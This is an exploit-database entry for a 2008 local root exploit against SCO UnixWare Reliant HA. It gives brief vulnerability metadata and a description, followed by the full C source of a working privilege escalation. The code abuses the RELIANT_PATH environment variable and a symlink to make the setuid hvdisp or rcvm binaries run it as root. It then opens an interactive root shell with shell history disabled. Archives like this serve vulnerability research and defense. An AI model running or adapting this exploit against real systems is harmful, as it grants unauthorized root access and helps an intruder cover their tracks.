SCO UnixWare Reliant HA Local Root Exploit

vendor:

UnixWare Reliant HA

by:

qaaz

7.2

CVSS

HIGH

Local Privilege Escalation

264

CWE

Product Name: UnixWare Reliant HA

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: o:sco:unixware_reliant_ha

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: UnixWare

2008

SCO UnixWare Reliant HA Local Root Exploit

This exploit is a local privilege escalation vulnerability in SCO UnixWare Reliant HA. It allows a local user to gain root privileges by exploiting a symlink vulnerability in the hvdisp and rcvm binaries. The exploit creates a symlink to the current process's a.out file in the bin directory, and then sets the RELIANT_PATH environment variable to the current working directory. This allows the exploit to execute the hvdisp or rcvm binary with root privileges.

Mitigation:

The vendor has not released a patch for this vulnerability. The best mitigation is to restrict access to the vulnerable binaries.

Source

Exploit-DB raw data:

/* 04/2008: public release
 * I have'nt seen any advisory on this; possibly still not fixed.
 *
 * SCO UnixWare Reliant HA Local Root Exploit
 * By qaaz
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>

#define TGT1	"/usr/opt/reliant/bin/hvdisp"
#define TGT2	"/usr/opt/reliant/bin/rcvm"
#define DIR	"bin"
#define BIN	DIR "/hvenv"

int	main(int argc, char *argv[])
{
	char	self[4096], *target;
	pid_t	child;

	if (geteuid() == 0) {
		setuid(geteuid());
		dup2(3, 0);
		dup2(4, 1);
		dup2(5, 2);
		if ((child = fork()) == 0) {
			putenv("HISTFILE=/dev/null");
			execl("/bin/sh", "sh", "-i", NULL);
			printf("[-] sh: %s\n", strerror(errno));
		} else if (child != -1)
			waitpid(child, NULL, 0);
		kill(getppid(), 15);
		return 1;
	}

	printf("----------------------------------------\n");
	printf(" UnixWare Reliant HA Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("----------------------------------------\n");

	if (access(TGT1, EX_OK) == 0)
		target = TGT1;
	else if (access(TGT2, EX_OK) == 0)
		target = TGT2;
	else {
		printf("[-] No targets found\n");
		return 1;
	}

	sprintf(self, "/proc/%d/object/a.out", getpid());

	if (mkdir(DIR, 0777) < 0 && errno != EEXIST) {
		printf("[-] %s: %s\n", DIR, strerror(errno));
		return 1;
	}

	if (symlink(self, BIN) < 0) {
		printf("[-] %s: %s\n", BIN, strerror(errno));
		rmdir(DIR);
		return 1;
	}

	if ((child = fork()) == 0) {
		char path[4096] = "RELIANT_PATH=";

		dup2(0, 3);
		dup2(1, 4);
		dup2(2, 5);
		putenv(strcat(path, getcwd(NULL, sizeof(path)-14)));
		execl(target, target, NULL);
		printf("[-] %s: %s\n", target, strerror(errno));
		return 1;
	} else if (child != -1)
		waitpid(child, NULL, 0);

	unlink(BIN);
	rmdir(DIR);
	return 0;
}

// milw0rm.com [2008-04-04]